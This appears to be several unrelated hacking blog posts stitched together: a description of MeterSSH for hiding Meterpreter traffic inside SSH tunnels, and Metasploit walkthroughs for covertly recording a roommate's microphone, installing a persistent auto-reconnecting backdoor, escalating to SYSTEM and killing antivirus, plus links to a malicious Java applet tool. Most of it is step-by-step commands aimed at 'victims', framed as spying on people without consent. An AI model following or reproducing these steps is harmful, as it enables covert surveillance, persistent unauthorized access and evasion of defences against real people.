MeterSSH – Meterpreter over SSH

As penetration testers, it’s crucial to identify what types of attacks are detected and what’s not. After running into a recent penetration test with a next generation firewall, most analysis has shifted away from the endpoints and more towards network analysis. While there needs to be a mixture of both, MeterSSH demonstrates how easy it is to circumvent a lot of these signature based “next generation” product lines.

MeterSSH is a way to take shellcode, inject it into memory then tunnel whatever port you want to over SSH to mask any type of communications as a normal SSH connection. The way it works is by injecting shellcode into memory, then wrapping a port spawned (meterpeter in this case) by the shellcode over SSH back to the attackers machine. Then connecting with meterpreter’s listener to localhost will communicate through the SSH proxy, to the victim through the SSH tunnel. All communications are relayed through the SSH tunnel and not through the network.

MeterSSH is an easy way to inject native shellcode into memory and pipe anything over SSH to the attacker machine through an SSH tunnel and all self contained into one single Python file. Python can easily be converted to an executable using pyinstaller or py2exe.

Features

1. Meterpreter over SSH
2. Ability to configure different IP’s, addresses, etc. without the need to ever change the shellcode.
3. Monitor for the SSH connection and automatically spawn the shell

Usage

MeterSSH is easy – simply edit the meterssh.py file and add your SSH server IP, port, username, and password and run the script. It will spawn meterpreter through memory injection (in this case a windows/meterpreter/bind_tcp) and bind to port 8021. Paramiko (python SSH module) is used to tunnel meterpreter over 8021 and back to the attacker and all communications tucked within that SSH tunnel.

There are two files, monitor.py and meterssh.py.

• monitor.py – run this in order to listen for an SSH connection, it will poll for 8021 on localhost for an SSH tunnel then spawn Metasploit for you automatically to grab the shell.
• meterssh.py – this is what you would deploy to the victim machine – note that most windows machines wont have Python installed, its recommended to compile Python with py2exe or pyinstaller.

There are two files, monitor.py and meterssh.py.

Fields you need to edit inside meterssh.py

user = "sshuser"
# password for SSH
password = "sshpw"
# this is where your SSH server is running
rhost = "192.168.1.1"
# remote SSH port - this is the attackers SSH server
port = "22"

• user – this is the user account for the attackers SSH server (do not use root, does not need root)
• password – this is the password for the attackers SSH server
• rhost – this is the attackers SSH server IP address
• port – this is the attackers SSH server port

Note that you DO NOT need to change the Metasploit shellcode, the Metasploit shellcode is simply an unmodified windows/meterpreter/bind_tcp that binds to port 8021. If you want to change this, just switch the shellcode out and change port 8021 inside the script to bind to whatever port you want to. You do not need to do this however unless you want to customize/modify.

More information can be found at: https://github.com/trustedsec/meterssh

How to Remotely Record & Listen to the Microphone on Anyone’s Computer

So many of you responded positively to my post about using the keylogger, as well as my post regarding turning on the webcam, that I decided that you might enjoy another similar hack. In this article, we will enable the audio recording capability on the remote system of your roommate.

Once again, let’s fire up Metasploit from BackTrack and embed the Meterpreter on the remote or victim system. There are a number of ways of doing this, so check back to my earlier posts to see how to install it via amalicious clickable link, a malicious Microsoft Office document or Adobe Acrobat file, and more.

How to Record Computer Audio Remotely

From here, we should have a Meterpreter prompt on our system that reflects the control panel of the Meterpreter on the remote victim system.

Here we have almost total control of their system. We can turn off their antivirus system, embed a software keylogger, turn on their webcam, etc. In this case, we will use a script that turns on the sound recording on our roommate’s computer system and enables us to play back this recording at a later time.

Step 1: Find the sound__recorder.rb Script

As this script is relatively new (2010), let’s make certain that your version of Metasploit has the sound recorder script. First, open a second terminal and navigate to the following directory.

root@bt > cd /opt/metasploit/msf3/scripts/meterpreter

Once we are in this directory, simply do a listing of all files by typing:

root@bt: /opt/metasploit/msf3/scripts/meterpreter ls -l

The script should appear among the list of meterpreter scripts. If it doesn’t, you can either update your Metasploit by typing in the msfconsole:

msf > msfupdate

Or you can download the script here.

Make sure that you save it to the directory/opt/metasploit/msf3/scripts/meterpreter.

Step 2: Run sound__recorder

Now that we have the script in the proper directory, let’s run it. First, let’s look at the help file by typing:

meterpreter > run sound_recorder -h

Notice that we have just a couple options. We can specify the number of 30 second intervals to record with the –i switch and the directory to save the recorded file to with the –l switch. So, let’s record 15 minutes (30 x 30 seconds = 15 minutes) of our roommate and save the file in the /etcdirectory. We can do this by typing:

meterpreter > run sound_recorder -i 30 -l /etc

Step 3: Play Back the Recording

When the recording has completed and run its course, the Meterpreter will save the recording to a file on our system in the directory we specified, or in this case the /etc directory.

Now we simply need to run that audio file in an audio player and we can hear everything that was going on in our roommate’s room during that 15 minutes.

This could be fun! Who knows what might be on that 15 minutes of recording every Saturday night!

How to Remotely Install an Auto-Reconnecting Persistent Back Door on Someone’s PC

Most of my recent posts have addressed using Metasploit’s Meterpreter and what we can do once we have embedded it on the victim’s system. This includes remotely installing a keylogger, enabling the webcam, enabling the microphone and recording, disabling the antivirus software, among many other things. The list is almost unlimited.

Unfortunately, the Meterpreter ceases to work if the victim system is rebooted. As a result, many of you have written me asking whether we can maintain or persist the Meterpreter on the victim system.

The answer is an unequivocal “Yes!”

We can embed the Meterpreter and then come back later—even after the victim’s computer has been rebooted—and reconnect to our little backdoor or listener. I’m dedicating this post to showing you how to do this.

Getting Started

Let’s assume that you have been successful in embedding the Meterpreter on the victim’s system, and that you have a screen that looks like the screenshot below. If you’re not sure how to do this, check out some of my previous posts for help.

Now, let’s get started.

Step 1: Run the Persistence Script

Metasploit has a script named persistence that can enable us to set up a persistent Meterpreter (listener) on the victim’s system. First let’s take a look at the options that are available when we run this scrip by using the –h switch.

At the Meterpreter prompt, type the following:

meterpreter > run persistence -h

We can see in the screenshot above that…

–A switch starts a matching handler to connect to the agent.
-With the -L switch we tell the system where to place the Meterpreter on the target system.
-The –P switch tells the system what payload to use (Windows/Meterpreter/reverse_tcp is the default, so we won’t use this switch).
-S starts the agent on boot with system privileges.
-The -U switch starts the agent when the user (U) logs on.
-The -x switch starts the agent when the system boots.
-With the –i switch we can indicate the time interval between each connection attempt.
-The -p switch indicates the port, and finally…
-The –r switch indicates the IP address of our ( r ) system running Metasploit.

Here we will use the –A, -L, -x, -i, -p, and –r switches.

Type at the Meterpreter prompt:

meterpreter >run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113

This command then will run the persistence script that will start a matching handler (-A), place the Meterpreter at c:\\ on the target system (-L c:\\), starts the listener when the system boots (-x), checks every 30 seconds for a connection (-i 30), connects on port 443 (-p 443), and connects to the local system (ours) on IP address 192.168.1.113.

When we run this command, this is what we should see.

Step 2: Opening a Second Session

We can see that we have opened a Meterpreter session on the victim system.

We return to our Metasploit prompt, by typing:

meterpreter > background

This will return us to the msf prompt, where can now type:

msf exploit(ms08_067_netapi) > sessions –i

We see above that now we have two or more sessions running on the victim system (I actually have three sessions running on this victim) as the persistent Meterpreter has opened a second session on the system.

Step 3: Testing

This is all very nice, but the key here is whether the Meterpreter will reconnect to our system even after the target system reboots. We can test this by typing;

meterpreter > reboot

This will reboot the target/victim machine and if we are successful, the Meterpreter will reconnect to our system.

Even after the system reboots, the Meterpreter on the victim system attempts to connect to us every 30 seconds until it has successfully open a session for us.

Now we have successfully opened a persistent connection on the victim system that we can come back to time and time again to wreak havoc!

How to Kill and Disable Antivirus Software on a Remote PC

In some of my past articles, I’ve shown numerous ways of embedding a listener/rootkit on a remote system, including buffer overflows of the operating system, getting the victim to click on a link to our malicious website, and sending a malicious Microsoft Office and Adobe Acrobat file.

In each case, we’ve embedded a listener/rootkit that gives us control over the system. Metasploit has a powerful listener called Meterpreter that enables us to control the system, send more commands, pivot from the victim to other systems, elevate our privileges, and many other things, as we will see.

My next few posts will focus on how to use the Meterpreter in various powerful ways. Today, we will focus on how to use the Meterpreter to disable the antivirus protection on our victim system, which is more advanced than simply bypassing the antivirus program, as I wrote about last time.

Disabling is necessary because the next time the system is scanned by the victim’s antivirus software, it’s likely to detect our listener and disable it, so we need to take preemptive action to disable it before it can disable us.

So…fire up Metasploit and let’s get hacking!

Step 1: Getting Started

I’m assuming you have already embedded your Meterpreter listener by one of the many methods I’ve outlined in my earlier posts, and that you have a Meterpreter prompt as it appears in the screenshot below.

Before we can begin to kill the AV software, we need to escalate our privileges.

Usually, when we embed a listener on the victim’s system, the listener will only have the privileges of the user who provided us with a gateway to their system by clicking on the malicious website, Office doc, Abobe PDF, etc.

That user most often has limited rights or privileges to the system. Unlimited rights to do anything on the system is held by the administrator or system administrator (or sysadmin for short).

We need to escalate our privileges from the user to sysadmin to have our way with this computer.

Step 2: Checking the User

Before we start the process of escalation, let’s check what user we are logged in as. Type:

meterpreter > getuid

This will return the ID of the user we are logged in as. If we are anything but the sysadmin, we’ll need to escalate to kill the antivirus software.

Step 3: Escalate Privileges

Metasploit and its Meterpreter make it simple to escalate privileges to the sysadmin. Simply type getsystem at the Meterpreter prompt.

meterpreter > getsystem

Notice that Metasploit responds with “…got system (with technique 1)“. Metasploit has multiple methods to escalate privileges and it tries each of them out until one works.

In our case, it was successful with technique 1.

Step 4: Check That We Are Sysadmin

Now that Metasploit has told us that it has escalated our privileges to sysadmin, let’s make sure. Type:

meterpreter > getuid

As you can see in my screenshot above, the victim responds with NT AUTHORITY\SYSTEM, the syadmin user!

Congratulations! You can now have your way this victim.

Step 5: Kill the AntiVirus Software

Now that we have unlimited rights to this system, let’s kill the antivirus software. Metasploit has a Ruby script called killav.rb. We simply run that script from the Meterpreter prompt and it will kill the system’s antivirus software.

Make certain to start the script with the keyword run. Type:

meterpreter > run killav.rb

Notice from the screenshot above that the killav.rb script not only killed the antivirus process, but also the open command prompt.

Now that we have killed the antivirus process, we can remain hidden within their system and do as we please with little or no chance of being detected.

In upcoming blogs, we will explore more adventures with the power of our embedded listener/rootkit with sysadmin privileges. There is no limit what we can do now!

JAW: Java Applet Wizard, that makes you go java Meterpreter by payload

JAW: Java Applet Wizard
JAW is written in Python and comes in 2 flavors.

Flavor 1: Java applet maker using a meterpreter executable.
To do client-side attacks using evil java applets:
http://exploit.co.il/hacking/client-side-attack-using-evil-java-applets

Flavor 2: Java applet maker using a java meterpreter – full java attack script
By using Metasploit java meterpreter payload:
http://exploit.co.il/hacking/metasploit-java-meterpreter-payload